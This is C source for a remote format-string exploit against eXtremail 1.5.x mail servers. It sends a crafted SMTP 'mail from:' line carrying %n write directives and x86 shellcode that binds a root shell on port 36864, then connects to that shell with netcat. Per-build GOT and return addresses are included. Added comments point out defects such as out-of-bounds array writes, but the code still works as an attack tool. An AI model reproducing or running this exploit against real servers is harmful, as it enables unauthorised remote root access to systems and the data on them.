===================================================
Linux eXtremail 1.5.x Remote Format Strings Exploit
===================================================
/****************************************************************/
/* Linux eXtremail 1.5.x Remote Format Strings Exploit */
/* */
/* */
/* By B-r00t - 02/07/2003 */
/* */
/* Versions: Linux eXtremail-1.5-8 => VULNERABLE */
/* Linux eXtremail-1.5-5 => VULNERABLE */
/* Exploit uses format strings bug in fLog() of smtpd to bind a */
/* r00tshell to port 36864 on the target eXtremail server. */
/* */
/****************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define EXPLOIT "eXtreme"
#define DEST_PORT 25
// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);
// Globals
int socketfd, choice;   // socketfd: connected descriptor filled in by get_sock(); choice: index into targets[] set by main()
unsigned long GOT, RET; // copied out of targets[choice] by do_it(), which also prints them
char *myip;             // declared but not referenced anywhere in this file
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n"; // first SMTP line main() sends after the banner is read
// Opaque machine-code payload that do_it() appends to the SMTP line with
// strncat (so it must not contain a 0x00 byte; none appears below).
// The first 60 bytes are 0x90 (x86 NOP); the final seven bytes are the
// ASCII string "/bin/sh".
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";
// One row per supported build. do_it() reads the numeric fields of
// targets[choice]; usage() lists the labels. The trailing { 0 } row is the
// sentinel usage() stops at (first NULL systemtype).
struct {
char *systemtype;   // label printed by usage() and in do_it()'s summary
unsigned long got;  // copied to the global GOT in do_it(); its four bytes are placed into the payload
unsigned long ret;  // copied to the global RET in do_it(); its four bytes drive the w[] width computation
int pad;            // number of 'a' bytes do_it() inserts ahead of the addresses
int buf;            // printed by do_it() as the "max bytes" figure; never compared against the real length
int pos;            // first positional argument index used in do_it()'s "%<n>$n" directives (pos .. pos+3)
} targets[] = {
// Confirmed targets tested by B-r00t.
{ "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)", 0x0813b19c, 0xbefff1e8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)", 0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)", 0xbefff0c8,
0xbefff1d4, 1, 266, 44},
{ "eXtremail V1.5 DEBUG", 0x44434241, 0xaaaaaaaa, 1, 266,
44},
{ 0 }   // sentinel row
};
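/*
 * Entry point.  argv[1] is the server address (dotted quad), argv[2] the
 * index into targets[].  Connects, reads the banner, sends the HELO line,
 * reads the reply, then calls do_it(), which never returns.
 * Bad or missing arguments go to usage(), which also never returns.
 */
int main ( int argc, char *argv[] )
{
    char *TARGET = "TARGET";
    char *end = NULL;
    long sel;

    printf ("\n%s by B-r00t <[email protected]>. (c) 2003\n",
            EXPLOIT);
    if (argc < 3)
        usage ();

    /* strtol instead of atoi: a non-numeric argv[2] is rejected instead of
     * silently becoming target 0. */
    sel = strtol(argv[2], &end, 10);
    /* The upper bound 3 must track the last real row of targets[]. */
    if (end == argv[2] || *end != '\0' || sel < 0 || sel > 3)
        usage ();
    choice = (int) sel;

    /* do_it() expands ${TARGET} in its shell command; get_sock() below exits
     * unless inet_aton() accepts this value first. */
    setenv (TARGET, argv[1], 1);
    get_sock(argv[1]);
    sleep (1);
    read_sock ();
    sleep (1);
    send_sock (helo);
    sleep (1);
    read_sock ();
    sleep(1);
    do_it ();
    return 0;   /* not reached: do_it() ends with exit(0) */
}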
/*
 * Print the invocation syntax, an example, and the numbered rows of
 * targets[] (up to the NULL sentinel), then terminate with exit(-1).
 * Never returns.
 */
void usage (void)
{
    int idx = 0;

    printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
    printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
    while (targets[idx].systemtype != NULL) {
        printf ("\n%d\t%s", idx, targets[idx].systemtype);
        idx++;
    }
    printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
    exit (-1);
}
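/*
 * Open a TCP connection to host:DEST_PORT and store the descriptor in the
 * global socketfd.  Exits the process on failure with the same codes as
 * before (-1 socket, -2 bad address, -3 connect).
 * Returns the connected descriptor.
 */
int get_sock (char *host)
{
    struct sockaddr_in dest_addr = {0};   /* zero-fills sin_zero as well */

    socketfd = socket(AF_INET, SOCK_STREAM, 0);
    if (socketfd == -1) {
        perror("Socket Error!");   /* perror appends ": <reason>\n" itself */
        exit (-1);
    }
    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(DEST_PORT);
    /* inet_aton() does not set errno, so perror() would print a stale value. */
    if (! inet_aton(host, &dest_addr.sin_addr)) {
        fprintf(stderr, "inet_aton problems\n");
        close (socketfd);
        exit (-2);
    }
    /* sizeof dest_addr, not sizeof(struct sockaddr): tied to the object passed */
    if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof dest_addr) == -1) {
        perror("Connect failed!");
        close (socketfd);
        exit (-3);
    }
    printf ("\n\nConnected to %s\n", host);
    return socketfd;
}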
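/*
 * Send the NUL-terminated string `stuff` over the global socketfd.
 * Loops until every byte has been handed to send(), since a stream socket
 * may accept fewer bytes than requested.  On error prints the reason,
 * closes the socket and exit(4).  An empty string sends nothing.
 * Returns the number of bytes sent (strlen(stuff) on success).
 */
int send_sock (char *stuff)
{
    size_t total = strlen(stuff);
    size_t done = 0;

    while (done < total) {
        ssize_t bytes = send (socketfd, stuff + done, total - done, 0);
        if (bytes == -1) {
            perror("Send error");
            close (socketfd);
            exit(4);
        }
        done += (size_t) bytes;
    }
    printf ("Send:\t%s", stuff);
    return (int) done;
}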
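/*
 * Read one chunk from the global socketfd into a local buffer and echo it
 * to stdout.  At most sizeof(buffer)-1 bytes are requested so the buffer
 * always stays NUL-terminated for the "%s" below (the original asked for
 * the full 200 and could print past the end).  On recv() error prints the
 * reason, closes the socket and exit(4).
 * Returns the byte count recv() reported (0 when the peer closed).
 */
int read_sock (void)
{
    char buffer[200];
    ssize_t bytes;

    memset (buffer, '\0', sizeof(buffer));
    bytes = recv (socketfd, buffer, sizeof(buffer) - 1, 0);
    if (bytes == -1) {
        perror("recv error");   /* was "send error": wrong call named */
        close (socketfd);
        exit(4);
    }
    printf ("Recv:\t%s", buffer);
    return (int) bytes;
}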
/*
 * Build the single "mail from:" SMTP line that carries the payload, print a
 * summary, send it over socketfd, then run `nc` via system() and exit(0).
 * Declared int but never returns.
 * Reads globals: choice, targets[], shellcode, socketfd.  Writes GOT, RET.
 */
int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
// BUG: r, g and w are each indexed 0..3 below but only 3 elements are
// declared; every [3] store is an out-of-bounds write (undefined behaviour).
unsigned char r[3], g[3], w[3];
RET = targets[choice].ret;
// Split RET into its four bytes, lowest first.
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);
GOT = targets[choice].got;
// Same split for GOT.
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);
// Start buf
bufptr = buf;
// bzero is legacy (removed from POSIX.1-2008); memset is the portable form.
bzero (bufptr, sizeof(buf));
// Copies exactly 11 bytes with no terminator of its own; the bzero above
// supplies the NUL that the strncat calls below rely on.
strncpy (buf, "mail from: ", strlen("mail from: "));
// NOTE(review): 19, not the 11 bytes actually written — presumably counts
// text the server prepends before logging; cannot be confirmed from this file.
sofar = 19;
// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;
//1st GOT addy
// NOTE: g is unsigned char[] passed where char * is expected (pointer-sign
// warning), and strncat stops at the first 0x00 byte, so an address
// containing a zero byte is truncated here and in the three copies below.
strncat (buf, g, 4);
//2nd GOT addy
p = &g[0];
(*p)++;   // bumps the low byte only; no carry into g[1]
strncat (buf, g, 4);
// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;
// w[loop] ends up as (r[loop] - sofar) mod 256, computed case by case.
// r[loop] is promoted to int for the comparisons; once sofar exceeds 255
// the third branch yields a negative int that wraps on store into the
// unsigned char, which is what keeps the result correct modulo 256.
for (loop=0; loop<4; loop++) {
if (r[loop] > sofar) {
w[loop] = r[loop]-sofar;
} else
if (r[loop] == sofar) {
w[loop] = 0;
}else
if (r[loop] < sofar) {
w[loop] = (256-sofar)+r[loop];
}
sofar = sofar+w[loop];
}
bufptr = format;
bzero (bufptr, sizeof(format));
// Emits four "%.<w>u%<POS+i>$n" pairs; the doubled %% become literal '%'.
// Worst case is well under the 200-byte format buffer.
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));
// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
// %x with an unsigned long argument is a format/argument mismatch (%lx).
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
// strlen() returns size_t, so %d mismatches (%zu); the "max" figure is
// only printed here, never enforced against the real length.
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf),
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);
// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
// ${TARGET} is expanded by the shell; main() set it from argv[1], and
// get_sock() has already exited unless inet_aton() accepted that value.
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}